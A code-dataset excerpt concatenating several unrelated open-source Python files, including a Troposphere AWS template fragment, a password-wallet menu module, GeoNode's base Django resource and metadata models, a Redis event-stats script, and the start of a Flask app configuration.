'alarmWorkerCPU',
AlarmDescription='Worker scaling group high CPU',
AlarmActions=[Ref(self.notification_topic_arn)],
Statistic='Average',
Period=300,
Threshold='50',
EvaluationPeriods=1,
ComparisonOperator='GreaterThanThreshold',
MetricName='CPUUtilization',
Namespace='AWS/EC2',
Dimensions=[
cw.MetricDimension(
'metricAutoScalingGroupName',
Name='AutoScalingGroupName',
Value=Ref(worker_auto_scaling_group)
)
]
))
def create_dns_records(self, worker_lb):
self.add_condition('BlueCondition', Equals('Blue', Ref(self.color)))
self.add_condition('GreenCondition', Equals('Green', Ref(self.color)))
self.add_resource(r53.RecordSetGroup(
'dnsPublicRecordsBlue',
Condition='BlueCondition',
HostedZoneName=Join('', [Ref(self.public_hosted_zone_name), '.']),
RecordSets=[
r53.RecordSet(
'dnsTileServersBlue',
AliasTarget=r53.AliasTarget(
GetAtt(worker_lb, 'CanonicalHostedZoneNameID'),
GetAtt(worker_lb, 'DNSName'),
True
),
Name=Join('', ['blue-workers.',
Ref(self.public_hosted_zone_name), '.']),
Type='A'
)
]
))
self.add_resource(r53.RecordSetGroup(
'dnsPublicRecordsGreen',
Condition='GreenCondition',
HostedZoneName=Join('', [Ref(self.public_hosted_zone_name), '.']),
RecordSets=[
r53.RecordSet(
'dnsTileServersGreen',
AliasTarget=r53.AliasTarget(
GetAtt(worker_lb, 'CanonicalHostedZoneNameID'),
GetAtt(worker_lb, 'DNSName'),
True
),
Name=Join('', ['green-workers.',
Ref(self.public_hosted_zone_name), '.']),
Type='A'
)
]
))
def get_tags(self, **kwargs):
"""Helper method to return Troposphere tags + default tags
Args:
**kwargs: arbitrary keyword arguments to be used as tags
"""
kwargs.update(self.default_tags)
return Tags(**kwargs)
| apache-2.0 | -5,937,930,016,655,273,000 | 35.875294 | 84 | 0.540327 | false |
hashtag1138/pass_wallet | menutrousseau.py | 1 | 2983 | from error_handler import MyError, ErrorScreen0
from menu import Menu
import os, time
class Trousseau0(Menu):
def __init__(self, parent):
super().__init__(parent)
self.entrees = None
self.selected = 0
def loadPasswordList(self):
try:
# --- Open ---
conf_file = open('config.txt', 'r')
line = conf_file.readline()
# --- Read ---
while ( "password_directory=" not in line) and len(line)>0: #Lecture
line = conf_file.readline()
# --- Search option ---
if not "password_directory=" in line :
raise MyError("Password_directory not found in config.txt")
# --- Extract path value ---
start = line.find("=") + 1
if start == 0 :
raise MyError(" '=' not found in : " + line)
end = line.find(";")
if end == -1 :
raise MyError(" ';' not found in : " + line)
password_path = line[start:end]
if not os.path.exists(password_path):
raise MyError(password_path + " not found")
pass_list = []
for filename in os.listdir(password_path):
pass_file = open(password_path+'/'+filename, 'r')
content = pass_file.readline()
pass_list.append({'name': filename, 'submenu':
Password(self, titre=filename, encrypted=content)})
return pass_list
except Exception as e:
print(e)
return [{'name' : '0 mot de passe', 'submenu' : ErrorScreen0(self, e)}]
def display(self, key, display):
# --- Loading Passwords ---
if not self.entrees:
self.entrees = self.loadPasswordList()
# --- Rendering ---
self.printList(display, self.selected, self.entrees)
# --- User's Inputs ---
return self.selectMenu(key, display)
class Password(Menu):
def __init__(self, parent, titre=None, encrypted=None):
super().__init__(parent)
self.titre = titre
self.encrypted = encrypted
self.decrypted = None
self.menu_unlock = Unlock0(self)
self.menu_play = Play0(self)
self.menu_modify = Modify0(self)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println(self.titre)
display.println(self.encrypted)
return self
class Unlock0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
display.clear()
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Unlock0")
return self
class Play0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Play0")
return self
class Modify0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Modify0")
return self
| gpl-3.0 | -3,663,898,111,024,548,400 | 22.864 | 74 | 0.610795 | false |
terranodo/geonode | geonode/base/models.py | 1 | 34374 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import datetime
import math
import os
import logging
from pyproj import transform, Proj
from urlparse import urljoin, urlsplit
from django.db import models
from django.core import serializers
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.db.models import signals
from django.core.files.storage import default_storage as storage
from django.core.files.base import ContentFile
from mptt.models import MPTTModel, TreeForeignKey
from polymorphic.models import PolymorphicModel
from polymorphic.managers import PolymorphicManager
from agon_ratings.models import OverallRating
from geonode.base.enumerations import ALL_LANGUAGES, \
HIERARCHY_LEVELS, UPDATE_FREQUENCIES, \
DEFAULT_SUPPLEMENTAL_INFORMATION, LINK_TYPES
from geonode.utils import bbox_to_wkt
from geonode.utils import forward_mercator
from geonode.security.models import PermissionLevelMixin
from taggit.managers import TaggableManager, _TaggableManager
from taggit.models import TagBase, ItemBase
from treebeard.mp_tree import MP_Node
from geonode.people.enumerations import ROLE_VALUES
logger = logging.getLogger(__name__)
class ContactRole(models.Model):
"""
ContactRole is an intermediate model to bind Profiles as Contacts to Resources and apply roles.
"""
resource = models.ForeignKey('ResourceBase')
contact = models.ForeignKey(settings.AUTH_USER_MODEL)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_('function performed by the responsible '
'party'))
def clean(self):
"""
Make sure there is only one poc and author per resource
"""
if (self.role == self.resource.poc_role) or (self.role == self.resource.metadata_author_role):
contacts = self.resource.contacts.filter(contactrole__role=self.role)
if contacts.count() == 1:
# only allow this if we are updating the same contact
if self.contact != contacts.get():
raise ValidationError('There can be only one %s for a given resource' % self.role)
if self.contact.user is None:
# verify that any unbound contact is only associated to one resource
bounds = ContactRole.objects.filter(contact=self.contact).count()
if bounds > 1:
raise ValidationError('There can be one and only one resource linked to an unbound contact' % self.role)
elif bounds == 1:
# verify that if there was one already, it corresponds to this instance
if ContactRole.objects.filter(contact=self.contact).get().id != self.id:
raise ValidationError('There can be one and only one resource linked to an unbound contact'
% self.role)
class Meta:
unique_together = (("contact", "resource", "role"),)
class TopicCategory(models.Model):
"""
Metadata about high-level geographic data thematic classification.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_MD_TopicCategoryCode">
"""
identifier = models.CharField(max_length=255, default='location')
description = models.TextField(default='')
gn_description = models.TextField('GeoNode description', default='', null=True)
is_choice = models.BooleanField(default=True)
fa_class = models.CharField(max_length=64, default='fa-times')
def __unicode__(self):
return u"{0}".format(self.gn_description)
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Topic Categories'
class SpatialRepresentationType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_SpatialRepresentationTypeCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.CharField(max_length=255, editable=False)
gn_description = models.CharField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Spatial Representation Types'
class RegionManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Region(MPTTModel):
# objects = RegionManager()
code = models.CharField(max_length=50, unique=True)
name = models.CharField(max_length=255)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children')
def __unicode__(self):
return self.name
class Meta:
ordering = ("name",)
verbose_name_plural = 'Metadata Regions'
class MPTTMeta:
order_insertion_by = ['name']
class RestrictionCodeType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_RestrictionCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.TextField(max_length=255, editable=False)
gn_description = models.TextField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Restriction Code Types'
class License(models.Model):
identifier = models.CharField(max_length=255, editable=False)
name = models.CharField(max_length=100)
abbreviation = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField(null=True, blank=True)
url = models.URLField(max_length=2000, null=True, blank=True)
license_text = models.TextField(null=True, blank=True)
def __unicode__(self):
return self.name
@property
def name_long(self):
if self.abbreviation is None or len(self.abbreviation) == 0:
return self.name
else:
return self.name+" ("+self.abbreviation+")"
@property
def description_bullets(self):
if self.description is None or len(self.description) == 0:
return ""
else:
bullets = []
lines = self.description.split("\n")
for line in lines:
bullets.append("+ "+line)
return bullets
class Meta:
ordering = ("name", )
verbose_name_plural = 'Licenses'
class HierarchicalKeyword(TagBase, MP_Node):
node_order_by = ['name']
@classmethod
def dump_bulk_tree(cls, parent=None, keep_ids=True):
"""Dumps a tree branch to a python data structure."""
qset = cls._get_serializable_model().get_tree(parent)
ret, lnk = [], {}
for pyobj in qset:
serobj = serializers.serialize('python', [pyobj])[0]
# django's serializer stores the attributes in 'fields'
fields = serobj['fields']
depth = fields['depth']
fields['text'] = fields['name']
fields['href'] = fields['slug']
del fields['name']
del fields['slug']
del fields['path']
del fields['numchild']
del fields['depth']
if 'id' in fields:
# this happens immediately after a load_bulk
del fields['id']
newobj = {}
for field in fields:
newobj[field] = fields[field]
if keep_ids:
newobj['id'] = serobj['pk']
if (not parent and depth == 1) or\
(parent and depth == parent.depth):
ret.append(newobj)
else:
parentobj = pyobj.get_parent()
parentser = lnk[parentobj.pk]
if 'nodes' not in parentser:
parentser['nodes'] = []
parentser['nodes'].append(newobj)
lnk[pyobj.pk] = newobj
return ret
class TaggedContentItem(ItemBase):
content_object = models.ForeignKey('ResourceBase')
tag = models.ForeignKey('HierarchicalKeyword', related_name='keywords')
# see https://github.com/alex/django-taggit/issues/101
@classmethod
def tags_for(cls, model, instance=None):
if instance is not None:
return cls.tag_model().objects.filter(**{
'%s__content_object' % cls.tag_relname(): instance
})
return cls.tag_model().objects.filter(**{
'%s__content_object__isnull' % cls.tag_relname(): False
}).distinct()
class _HierarchicalTagManager(_TaggableManager):
def add(self, *tags):
str_tags = set([
t
for t in tags
if not isinstance(t, self.through.tag_model())
])
tag_objs = set(tags) - str_tags
# If str_tags has 0 elements Django actually optimizes that to not do a
# query. Malcolm is very smart.
existing = self.through.tag_model().objects.filter(
slug__in=str_tags
)
tag_objs.update(existing)
for new_tag in str_tags - set(t.slug for t in existing):
tag_objs.add(HierarchicalKeyword.add_root(name=new_tag))
for tag in tag_objs:
self.through.objects.get_or_create(tag=tag, **self._lookup_kwargs())
class ResourceBaseManager(PolymorphicManager):
def admin_contact(self):
# this assumes there is at least one superuser
superusers = get_user_model().objects.filter(is_superuser=True).order_by('id')
if superusers.count() == 0:
raise RuntimeError('GeoNode needs at least one admin/superuser set')
return superusers[0]
def get_queryset(self):
return super(ResourceBaseManager, self).get_queryset().non_polymorphic()
def polymorphic_queryset(self):
return super(ResourceBaseManager, self).get_queryset()
class ResourceBase(PolymorphicModel, PermissionLevelMixin, ItemBase):
"""
Base Resource Object loosely based on ISO 19115:2003
"""
VALID_DATE_TYPES = [(x.lower(), _(x)) for x in ['Creation', 'Publication', 'Revision']]
date_help_text = _('reference date for the cited resource')
date_type_help_text = _('identification of when a given event occurred')
edition_help_text = _('version of the cited resource')
abstract_help_text = _('brief narrative summary of the content of the resource(s)')
purpose_help_text = _('summary of the intentions with which the resource(s) was developed')
maintenance_frequency_help_text = _('frequency with which modifications and deletions are made to the data after '
'it is first produced')
keywords_help_text = _('commonly used word(s) or formalised word(s) or phrase(s) used to describe the subject '
'(space or comma-separated')
regions_help_text = _('keyword identifies a location')
restriction_code_type_help_text = _('limitation(s) placed upon the access or use of the data.')
constraints_other_help_text = _('other restrictions and legal prerequisites for accessing and using the resource or'
' metadata')
license_help_text = _('license of the dataset')
language_help_text = _('language used within the dataset')
category_help_text = _('high-level geographic data thematic classification to assist in the grouping and search of '
'available geographic data sets.')
spatial_representation_type_help_text = _('method used to represent geographic information in the dataset.')
temporal_extent_start_help_text = _('time period covered by the content of the dataset (start)')
temporal_extent_end_help_text = _('time period covered by the content of the dataset (end)')
data_quality_statement_help_text = _('general explanation of the data producer\'s knowledge about the lineage of a'
' dataset')
# internal fields
uuid = models.CharField(max_length=36)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_resource',
verbose_name=_("Owner"))
contacts = models.ManyToManyField(settings.AUTH_USER_MODEL, through='ContactRole')
title = models.CharField(_('title'), max_length=255, help_text=_('name by which the cited resource is known'))
date = models.DateTimeField(_('date'), default=datetime.datetime.now, help_text=date_help_text)
date_type = models.CharField(_('date type'), max_length=255, choices=VALID_DATE_TYPES, default='publication',
help_text=date_type_help_text)
edition = models.CharField(_('edition'), max_length=255, blank=True, null=True, help_text=edition_help_text)
abstract = models.TextField(_('abstract'), blank=True, help_text=abstract_help_text)
purpose = models.TextField(_('purpose'), null=True, blank=True, help_text=purpose_help_text)
maintenance_frequency = models.CharField(_('maintenance frequency'), max_length=255, choices=UPDATE_FREQUENCIES,
blank=True, null=True, help_text=maintenance_frequency_help_text)
keywords = TaggableManager(_('keywords'), through=TaggedContentItem, blank=True, help_text=keywords_help_text,
manager=_HierarchicalTagManager)
regions = models.ManyToManyField(Region, verbose_name=_('keywords region'), blank=True,
help_text=regions_help_text)
restriction_code_type = models.ForeignKey(RestrictionCodeType, verbose_name=_('restrictions'),
help_text=restriction_code_type_help_text, null=True, blank=True,
limit_choices_to=Q(is_choice=True))
constraints_other = models.TextField(_('restrictions other'), blank=True, null=True,
help_text=constraints_other_help_text)
license = models.ForeignKey(License, null=True, blank=True,
verbose_name=_("License"),
help_text=license_help_text)
language = models.CharField(_('language'), max_length=3, choices=ALL_LANGUAGES, default='eng',
help_text=language_help_text)
category = models.ForeignKey(TopicCategory, null=True, blank=True, limit_choices_to=Q(is_choice=True),
help_text=category_help_text)
spatial_representation_type = models.ForeignKey(SpatialRepresentationType, null=True, blank=True,
limit_choices_to=Q(is_choice=True),
verbose_name=_("spatial representation type"),
help_text=spatial_representation_type_help_text)
# Section 5
temporal_extent_start = models.DateTimeField(_('temporal extent start'), blank=True, null=True,
help_text=temporal_extent_start_help_text)
temporal_extent_end = models.DateTimeField(_('temporal extent end'), blank=True, null=True,
help_text=temporal_extent_end_help_text)
supplemental_information = models.TextField(_('supplemental information'), default=DEFAULT_SUPPLEMENTAL_INFORMATION,
help_text=_('any other descriptive information about the dataset'))
# Section 8
data_quality_statement = models.TextField(_('data quality statement'), blank=True, null=True,
help_text=data_quality_statement_help_text)
# Section 9
# see metadata_author property definition below
# Save bbox values in the database.
# This is useful for spatial searches and for generating thumbnail images and metadata records.
bbox_x0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_x1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
srid = models.CharField(max_length=255, default='EPSG:4326')
# CSW specific fields
csw_typename = models.CharField(_('CSW typename'), max_length=32, default='gmd:MD_Metadata', null=False)
csw_schema = models.CharField(_('CSW schema'),
max_length=64,
default='http://www.isotc211.org/2005/gmd',
null=False)
csw_mdsource = models.CharField(_('CSW source'), max_length=256, default='local', null=False)
csw_insert_date = models.DateTimeField(_('CSW insert date'), auto_now_add=True, null=True)
csw_type = models.CharField(_('CSW type'), max_length=32, default='dataset', null=False, choices=HIERARCHY_LEVELS)
csw_anytext = models.TextField(_('CSW anytext'), null=True, blank=True)
csw_wkt_geometry = models.TextField(_('CSW WKT geometry'),
null=False,
default='POLYGON((-180 -90,-180 90,180 90,180 -90,-180 -90))')
# metadata XML specific fields
metadata_uploaded = models.BooleanField(default=False)
metadata_uploaded_preserve = models.BooleanField(default=False)
metadata_xml = models.TextField(null=True,
default='<gmd:MD_Metadata xmlns:gmd="http://www.isotc211.org/2005/gmd"/>',
blank=True)
popular_count = models.IntegerField(default=0)
share_count = models.IntegerField(default=0)
featured = models.BooleanField(_("Featured"), default=False,
help_text=_('Should this resource be advertised in home page?'))
is_published = models.BooleanField(_("Is Published"), default=True,
help_text=_('Should this resource be published and searchable?'))
# fields necessary for the apis
thumbnail_url = models.TextField(null=True, blank=True)
detail_url = models.CharField(max_length=255, null=True, blank=True)
rating = models.IntegerField(default=0, null=True, blank=True)
def __unicode__(self):
return self.title
@property
def bbox(self):
return [self.bbox_x0, self.bbox_y0, self.bbox_x1, self.bbox_y1, self.srid]
@property
def bbox_string(self):
return ",".join([str(self.bbox_x0), str(self.bbox_y0), str(self.bbox_x1), str(self.bbox_y1)])
@property
def geographic_bounding_box(self):
return bbox_to_wkt(self.bbox_x0, self.bbox_x1, self.bbox_y0, self.bbox_y1, srid=self.srid)
@property
def license_light(self):
a = []
if (not (self.license.name is None)) and (len(self.license.name) > 0):
a.append(self.license.name)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
@property
def license_verbose(self):
a = []
if (not (self.license.name_long is None)) and (len(self.license.name_long) > 0):
a.append(self.license.name_long+":")
if (not (self.license.description is None)) and (len(self.license.description) > 0):
a.append(self.license.description)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
def keyword_list(self):
return [kw.name for kw in self.keywords.all()]
def keyword_slug_list(self):
return [kw.slug for kw in self.keywords.all()]
def region_name_list(self):
return [region.name for region in self.regions.all()]
def spatial_representation_type_string(self):
if hasattr(self.spatial_representation_type, 'identifier'):
return self.spatial_representation_type.identifier
else:
if hasattr(self, 'storeType'):
if self.storeType == 'coverageStore':
return 'grid'
return 'vector'
else:
return None
@property
def keyword_csv(self):
keywords_qs = self.get_real_instance().keywords.all()
if keywords_qs:
return ','.join([kw.name for kw in keywords_qs])
else:
return ''
def set_latlon_bounds(self, box):
"""
Set the four bounds in lat lon projection
"""
self.bbox_x0 = box[0]
self.bbox_x1 = box[1]
self.bbox_y0 = box[2]
self.bbox_y1 = box[3]
def set_bounds_from_center_and_zoom(self, center_x, center_y, zoom):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.center_x = center_x
self.center_y = center_y
self.zoom = zoom
deg_len_equator = 40075160 / 360
# covert center in lat lon
def get_lon_lat():
wgs84 = Proj(init='epsg:4326')
mercator = Proj(init='epsg:3857')
lon, lat = transform(mercator, wgs84, center_x, center_y)
return lon, lat
# calculate the degree length at this latitude
def deg_len():
lon, lat = get_lon_lat()
return math.cos(lat) * deg_len_equator
lon, lat = get_lon_lat()
# taken from http://wiki.openstreetmap.org/wiki/Zoom_levels
# it might be not precise but enough for the purpose
distance_per_pixel = 40075160 * math.cos(lat)/2**(zoom+8)
# calculate the distance from the center of the map in degrees
# we use the calculated degree length on the x axis and the
# normal degree length on the y axis assumin that it does not change
# Assuming a map of 1000 px of width and 700 px of height
distance_x_degrees = distance_per_pixel * 500 / deg_len()
distance_y_degrees = distance_per_pixel * 350 / deg_len_equator
self.bbox_x0 = lon - distance_x_degrees
self.bbox_x1 = lon + distance_x_degrees
self.bbox_y0 = lat - distance_y_degrees
self.bbox_y1 = lat + distance_y_degrees
def set_bounds_from_bbox(self, bbox):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.set_latlon_bounds(bbox)
minx, miny, maxx, maxy = [float(c) for c in bbox]
x = (minx + maxx) / 2
y = (miny + maxy) / 2
(center_x, center_y) = forward_mercator((x, y))
xdiff = maxx - minx
ydiff = maxy - miny
zoom = 0
if xdiff > 0 and ydiff > 0:
width_zoom = math.log(360 / xdiff, 2)
height_zoom = math.log(360 / ydiff, 2)
zoom = math.ceil(min(width_zoom, height_zoom))
self.zoom = zoom
self.center_x = center_x
self.center_y = center_y
def download_links(self):
"""assemble download links for pycsw"""
links = []
for url in self.link_set.all():
if url.link_type == 'metadata': # avoid recursion
continue
if url.link_type == 'html':
links.append((self.title, 'Web address (URL)', 'WWW:LINK-1.0-http--link', url.url))
elif url.link_type in ('OGC:WMS', 'OGC:WFS', 'OGC:WCS'):
links.append((self.title, url.name, url.link_type, url.url))
else:
description = '%s (%s Format)' % (self.title, url.name)
links.append((self.title, description, 'WWW:DOWNLOAD-1.0-http--download', url.url))
return links
def get_tiles_url(self):
"""Return URL for Z/Y/X mapping clients or None if it does not exist.
"""
try:
tiles_link = self.link_set.get(name='Tiles')
except Link.DoesNotExist:
return None
else:
return tiles_link.url
def get_legend(self):
"""Return Link for legend or None if it does not exist.
"""
try:
legends_link = self.link_set.get(name='Legend')
except Link.DoesNotExist:
return None
except Link.MultipleObjectsReturned:
return None
else:
return legends_link
def get_legend_url(self):
"""Return URL for legend or None if it does not exist.
The legend can be either an image (for Geoserver's WMS)
or a JSON object for ArcGIS.
"""
legend = self.get_legend()
if legend is None:
return None
return legend.url
def get_ows_url(self):
"""Return URL for OGC WMS server None if it does not exist.
"""
try:
ows_link = self.link_set.get(name='OGC:WMS')
except Link.DoesNotExist:
return None
else:
return ows_link.url
def get_thumbnail_url(self):
"""Return a thumbnail url.
It could be a local one if it exists, a remote one (WMS GetImage) for example
or a 'Missing Thumbnail' one.
"""
local_thumbnails = self.link_set.filter(name='Thumbnail')
if local_thumbnails.count() > 0:
return local_thumbnails[0].url
remote_thumbnails = self.link_set.filter(name='Remote Thumbnail')
if remote_thumbnails.count() > 0:
return remote_thumbnails[0].url
return staticfiles.static(settings.MISSING_THUMBNAIL)
def has_thumbnail(self):
"""Determine if the thumbnail object exists and an image exists"""
return self.link_set.filter(name='Thumbnail').exists()
def save_thumbnail(self, filename, image):
upload_to = 'thumbs/'
upload_path = os.path.join('thumbs/', filename)
if storage.exists(upload_path):
# Delete if exists otherwise the (FileSystemStorage) implementation
# will create a new file with a unique name
storage.delete(os.path.join(upload_path))
storage.save(upload_path, ContentFile(image))
url_path = os.path.join(settings.MEDIA_URL, upload_to, filename).replace('\\', '/')
url = urljoin(settings.SITEURL, url_path)
Link.objects.get_or_create(resource=self,
url=url,
defaults=dict(
name='Thumbnail',
extension='png',
mime='image/png',
link_type='image',
))
ResourceBase.objects.filter(id=self.id).update(
thumbnail_url=url
)
def set_missing_info(self):
"""Set default permissions and point of contacts.
It is mandatory to call it from descendant classes
but hard to enforce technically via signals or save overriding.
"""
from guardian.models import UserObjectPermission
logger.debug('Checking for permissions.')
# True if every key in the get_all_level_info dict is empty.
no_custom_permissions = UserObjectPermission.objects.filter(
content_type=ContentType.objects.get_for_model(self.get_self_resource()),
object_pk=str(self.pk)
).exists()
if not no_custom_permissions:
logger.debug('There are no permissions for this object, setting default perms.')
self.set_default_permissions()
if self.owner:
user = self.owner
else:
user = ResourceBase.objects.admin_contact().user
if self.poc is None:
self.poc = user
if self.metadata_author is None:
self.metadata_author = user
def maintenance_frequency_title(self):
return [v for i, v in enumerate(UPDATE_FREQUENCIES) if v[0] == self.maintenance_frequency][0][1].title()
def language_title(self):
return [v for i, v in enumerate(ALL_LANGUAGES) if v[0] == self.language][0][1].title()
def _set_poc(self, poc):
# reset any poc assignation to this resource
ContactRole.objects.filter(role='pointOfContact', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='pointOfContact', resource=self, contact=poc)
def _get_poc(self):
try:
the_poc = ContactRole.objects.get(role='pointOfContact', resource=self).contact
except ContactRole.DoesNotExist:
the_poc = None
return the_poc
poc = property(_get_poc, _set_poc)
def _set_metadata_author(self, metadata_author):
# reset any metadata_author assignation to this resource
ContactRole.objects.filter(role='author', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='author', resource=self, contact=metadata_author)
def _get_metadata_author(self):
try:
the_ma = ContactRole.objects.get(role='author', resource=self).contact
except ContactRole.DoesNotExist:
the_ma = None
return the_ma
metadata_author = property(_get_metadata_author, _set_metadata_author)
objects = ResourceBaseManager()
class Meta:
# custom permissions,
# add, change and delete are standard in django-guardian
permissions = (
('view_resourcebase', 'Can view resource'),
('change_resourcebase_permissions', 'Can change resource permissions'),
('download_resourcebase', 'Can download resource'),
('publish_resourcebase', 'Can publish resource'),
('change_resourcebase_metadata', 'Can change resource metadata'),
)
class LinkManager(models.Manager):
"""Helper class to access links grouped by type
"""
def data(self):
return self.get_queryset().filter(link_type='data')
def image(self):
return self.get_queryset().filter(link_type='image')
def download(self):
return self.get_queryset().filter(link_type__in=['image', 'data'])
def metadata(self):
return self.get_queryset().filter(link_type='metadata')
def original(self):
return self.get_queryset().filter(link_type='original')
def geogig(self):
return self.get_queryset().filter(name__icontains='geogig')
def ows(self):
return self.get_queryset().filter(link_type__in=['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
class Link(models.Model):
"""Auxiliary model for storing links for resources.
This helps avoiding the need for runtime lookups
to the OWS server or the CSW Catalogue.
There are four types of links:
* original: For uploaded files (Shapefiles or GeoTIFFs)
* data: For WFS and WCS links that allow access to raw data
* image: For WMS and TMS links
* metadata: For CSW links
* OGC:WMS: for WMS service links
* OGC:WFS: for WFS service links
* OGC:WCS: for WCS service links
"""
resource = models.ForeignKey(ResourceBase)
extension = models.CharField(max_length=255, help_text=_('For example "kml"'))
link_type = models.CharField(max_length=255, choices=[(x, x) for x in LINK_TYPES])
name = models.CharField(max_length=255, help_text=_('For example "View in Google Earth"'))
mime = models.CharField(max_length=255, help_text=_('For example "text/xml"'))
url = models.TextField(max_length=1000)
objects = LinkManager()
def __str__(self):
return '%s link' % self.link_type
def resourcebase_post_save(instance, *args, **kwargs):
"""
Used to fill any additional fields after the save.
Has to be called by the children
"""
ResourceBase.objects.filter(id=instance.id).update(
thumbnail_url=instance.get_thumbnail_url(),
detail_url=instance.get_absolute_url(),
csw_insert_date=datetime.datetime.now())
instance.set_missing_info()
# we need to remove stale links
for link in instance.link_set.all():
if link.name == "External Document":
if link.resource.doc_url != link.url:
link.delete()
else:
if urlsplit(settings.SITEURL).hostname not in link.url:
link.delete()
def rating_post_save(instance, *args, **kwargs):
"""
Used to fill the average rating field on OverallRating change.
"""
ResourceBase.objects.filter(id=instance.object_id).update(rating=instance.rating)
signals.post_save.connect(rating_post_save, sender=OverallRating)
| gpl-3.0 | 8,784,097,328,487,510,000 | 39.583235 | 120 | 0.616367 | false |
orkestra-studios/nebuu-service | stats.py | 1 | 2397 | from datetime import date, datetime
from services import *
from collections import defaultdict
import sys
CATEGORIES = ["populerkultur", "yazmevsimi", "kismevsimi", "yesilcam", "emojiler", "gol", "turkdizileri", "evlilik", "para", "kultursanat", "sesinicikar", "ikililer", "okul", "taklit", "osmanli", "markalar", "parti", "neyapiyorum", "ruhhali", "2000ler", "cizgifilm", "hayvanlar", "90lar", "sarkilar", "muzisyenler", "meslekler", "2015geyikleri", "superkahramanlar", "filmler", "diziler", "ankara", "vucudumuzutaniyalim", "yermekan", "mutfak", "istanbul", "sehirler", "2014", "spordunyasi", "oyunlar", "tarih", "futboltakimlari", "bayram", "2013", "teknolojibilgisayar"]
OPEN_KEY = "co.orkestra.nebuu.event.open"
PLAY_KEY = "co.orkestra.nebuu.event.play"
BUY_KEY = "co.orkestra.nebuu.event.buy"
def get_opens(rdb, start,end=None):
OPEN_KEY = "co.orkestra.nebuu.event.open"
start_s = int(datetime.strptime(start, '%d-%m-%Y').strftime('%s'))
end_s = int(datetime.strptime(end, '%d-%m-%Y').strftime('%s')) if end else start_s+86399
dspan = [start_s, end_s]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opens_raw = load(OPEN_KEY)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
opens_raw
)
)
)
return len(opened)
def get_stats(for_date):
dspan = [int(datetime.strptime(for_date, '%d-%m-%Y').strftime('%s'))]
dspan += [dspan[0]+86400]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
load(OPEN_KEY)
)
)
)
played = defaultdict(int)
for e in []:#load(PLAY_KEY):
try:
assert(e['category'] in CATEGORIES)
played[e['category']] += 1
except: pass
played['total'] = sum(played.values())
return len(opened),played
if __name__ == '__main__':
dt = sys.argv[1]
try:
dtt = sys.argv[2]
except: dtt = None
stats = get_opens(dt, dtt)
print 'opened:', stats[0]
| gpl-3.0 | 4,208,475,431,737,372,000 | 33.242857 | 569 | 0.54902 | false |
danmilon/fragofonias | app.py | 1 | 1092 | from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.json import JSONEncoder
from datetime import date, datetime
import os
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://%s:%s@localhost/csa?charset=utf8' % (
os.environ['CSA_DB_USERNAME'], os.environ['CSA_DB_PASSWORD']
)
